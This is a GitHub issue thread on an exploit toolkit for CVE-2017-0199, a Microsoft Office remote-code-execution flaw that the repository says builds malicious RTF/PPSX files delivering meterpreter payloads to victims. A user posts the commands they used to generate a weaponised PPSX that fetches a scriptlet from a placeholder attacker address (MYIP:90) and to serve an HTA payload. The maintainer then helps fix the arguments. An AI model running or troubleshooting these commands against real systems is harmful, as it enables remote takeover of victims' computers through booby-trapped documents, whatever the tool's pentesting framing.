bhdresh / CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
723 stars 259 forks source link

Error PPSX #48

Closed moaeddy closed 7 years ago

moaeddy commented 7 years ago

i generate a PPSX file using command below

python cve-2017-0199_toolkit.py -M gen -w HHolPdcurf.ppsx -u http://MYIP:90/myfile.sct -x 1

Then

python cve-2017-0199_toolkit.py -M exp -t PPSX -p 90 -H index.hta

But i keep getting error in the image below when i execute HHolPdcurf.ppsx on windows PC pppx

am i missing something here?

bhdresh commented 7 years ago

@hostbob, I think you missed to specify -t argument which defined the type of file. In your case it should be -t PPSX

Hope this will help.

Thanks.